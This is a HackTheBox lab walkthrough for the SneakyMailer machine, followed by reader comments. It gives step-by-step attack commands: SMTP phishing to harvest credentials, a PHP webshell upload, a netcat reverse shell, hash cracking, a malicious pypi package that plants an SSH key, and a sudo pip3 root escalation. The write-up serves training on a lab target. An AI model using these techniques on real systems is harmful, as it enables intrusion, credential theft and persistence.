SneakyMailer HackTheBox Walkthrough
This is SneakyMailer HackTheBox walkthrough. In this writeup I have demonstrated step by step procedure how I rooted to SneakyMailer HTB machine. Before moving ahead let’s us know something about this machine. SneakyMailer is Linux Machine with IP address 10.10.10.197. It is given difficulty medium by its maker.
Now I am going to show you my steps.
First of all connect your local machine with VPN and confirm your connectivity by pinging the IP address 10.10.10.197. As usual, I began by scanning the IP of SneakyMailer machine so that I could get some starting point to proceed further. Nmap [a port scanner] gave the following result.
Scanning
$nmap -sV -sC -oN namp_scan 10.10.10.197
We have seven ports open. Let’s analyse each ports. Port 21 is open and vsftpd 3.0.3 service is running on it. Checked do we have anonymous login allowed by logging with anonymous: anonymous. But it is not allowed and we require a valid username and password to login. Then searched using searchsploit [tool to search exploits on exploit-db.com remotely] do we have any exploit available for current version of vsftpd server. No exploit available. Left it here and moved forward for further enumeration.
Port 80 is open and ngnix 1.14.2 web server is running over it. Nmap script http-title revealed the domain sneakycorp.htb. Added this domain to my host file.
Host File before Modification
Host File after Modification
After going to URL http://sneakycorp.htb/team.php found some users and their email addresses. Created a wordlist of all the email addresses using cewl as any one may be our potential email address to login into email client as port 25 is open.
Wordlist Creation
$cewl -n -e --email_file email.txt http://sneakycorp.htb
$cat email.txt
Port 25 is open and smtp server is running over it. Since already created an email list so tried to verify email address using SMTP. For more information you can see this video. And can find steps in this interesting article.
Telnet to SMTP Server
Start netcat listener in one window and do telnet in other window
$nc -nvlp 80
$telnet 10.10.10.197 25
~MAIL FROM: xyz.com
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~DATA
Hi Recepients anyone can ping me at http://10.10.14.9
^]
telnet>quit
Once the ping is done correctly you will get response at port 80 this response is only from valid email address. The response is URL encoded so decoded it online.
URL Decoding
After URL decoding we have the following information of a user.
firstName : Paul
lastName : Byrd
email : [email protected]
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
rpassword : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Now used this information to login in the email account of user paulbyrd. I have used evolution [a mail client]. Other mail clients can also be used for this purpose.
After successful login found a file inside the sent items containing Username and Password
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Didn’t know which account credential is this I mean SSH or FTP. Tried to SSH using developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C but wrong creds. Then tried FTP login using it and successfully logged in.
FTP login
$ftp 10.10.10.197
~developer
~m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Uploaded shell.php in /dev/ directory. You can get webshell at /usr/share/webshells/php/ in Kali OS. Tried to access the shell.php at URL http://sneakycorp.htb/shell.php [since index.php is also present in the same folder in which shell.php is present] but didn’t get access. Then, fuzzed the domain sneakycorp.htb WFUZZ for subdomain with seclist's subdomains-top1million-5000.txt wordlists.
FUZZING for subdomain
$wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.sneakycorp.htb" –u http://10.10.10.197/ --hc 400,301 -t 50 -c
Got a subdomain dev.sneakycorp.htb. So added it to my /etc/hosts file
Host File after Modification
Now the uploaded shell.php in dev folder of ftp account can be accessed at URL http://dev.sneakycorp.htb/shell.php . And we can get remote shell very easily
Getting Shell
1. Upload shell.php in /dev/ directory of ftp
$cd dev
$put shell.php
3. Start netcat listener locally
$nc -nvlp 2345
4. Access the URL http://dev.sneakycorp.htb/shell.php
Upgrade Shell
Upgrade shell to fully qualified Linux Shell
$python -c ‘import pty;pty.spawn("/bin/bash")’
CTRL + Z #to background the session
#stty raw -echo
#fg
Plus two times press enter
$export TERM=xterm-256color
$stty rows 60 columns 130
After some enumeration got a subdomain pypi.sneakycorp.htb inside /www/var/ directory, so added it to the /etc/hosts file. After modification the /etc/hosts file looks like
Hosts File after Modification
On further enumeration find password hash in .htpasswd file inside /var/www/pypi.sneakycorp.htb/ directory
$ cat /var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Identify Hash
Hash identification give possible algorithms: Apache MD5, md5apr1, MD5 (APR)
Stored the hash inside a file hash.txt and tried to crack it using hashcat [fastest hash cracker] and rockyou.txt wordlist
Cracking Hash
$hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt –force
Credential is pypi: soufianeelhaoui
Tried to use this credential to SSH and FTP but didn’t login. After going to URL http://pypi.sneakycorp.htb:8080 got pypiserver is running. No idea what to do next. After some googling found this article
According to the above article we can create a python package and that package can be deployed or stored inside the Pypi repository. And the stored package can be accessed using pypiserver.
Created a package named mypkg following the same steps as given in this https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/ article. Please read above article before creating and storing python package to pypi repository. I have reduced the number of steps, although I have done the same things as given in the above link.
Creating Python Package
$mkdir mypkg
$cd mypkg
$touch setup.py setup.cfg README.md
$mkdir mypkg
$cd mypkg
$nano __init__.py
$cat __init__.py
Generated ssh keys on my local computer because wanted to add my public key inside /home/low/.ssh/authorized_keys file. We will introduce our custom code into setup.py file to add our public ssh key to /home/low/.ssh/authorized_keys file
root@dkm:~/.ssh# ssh-keygen
$nano setup.py #Introduce your SSH Public Key inside this file
$cat setup.py
$nano setup.cfg
$cat setup.cfg
$python3 setup.py sdist #Compress package
$export HOME=/tmp/mypkg
$nano .pypirc #Create this file inside home directory
$cat .pypirc
$ python3 setup.py sdist upload -r mypkg # Upload package to repository
We can see the written SSH key inside authorized_keys file and can confirm with which is present on our local computer.
$ cat /home/low/.ssh/authorized_keys
Once we have written our SSH key to the authorized_keys file of user low, we can SSH into low’s account remotely via our private key which is stored inside our local computer /root/.ssh/ directory
SSH using Private Key
root@dkm:~/.ssh# chmod 700 id_rsa
root@dkm:~/.ssh# ssh -i id_rsa [email protected]
Capture User FLAG
$cat user.txt
Privilege Escalation
Finding PrivEsc Vector
Ran command $sudo -l to check special privilege user low has.
$ sudo -l
Got that user low can execute /usr/bin/pip3 command on SneakyMailer. So here our privilege escalation vector is exploitation of sudo rights. The exploitation is very easy just by entering three line of codes one by one. See this article https://gtfobins.github.io/gtfobins/pip/
$ TF=$(mktemp -d)
$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
$ sudo pip3 install $TF
Capture Root Flag
#cat /root/root.txt
This is how I rooted to the SneakyMailer HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Having any issue feel free to comment us. Want to give any suggestion about the writeup please write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/
Nice thanks
hello, could your explain, how did you write down ssh public key to authorized_keys. It seems that only low has rights to modify. Is it just because low is related to pypi-pkg group? And while package was uploading there was the possibility to write to authorized_keys.
Yes. It is because user low is related to pypi-pkg. In setup.py file we introduce our SSH key inside try block and remaining code inside except block. If writing of SSH key is successful it will leave except block. The ssh key is written to /home/low/.ssh/authorized_keys file due to write permission given to package folder and its file inside /var/www/pypi.sneakycorp.htb directory.
OK, thank you for reply. Actually, it is very nice writeup.
Could you help me login into the evolution found it difficult using it for the first time
Please check IppSec Video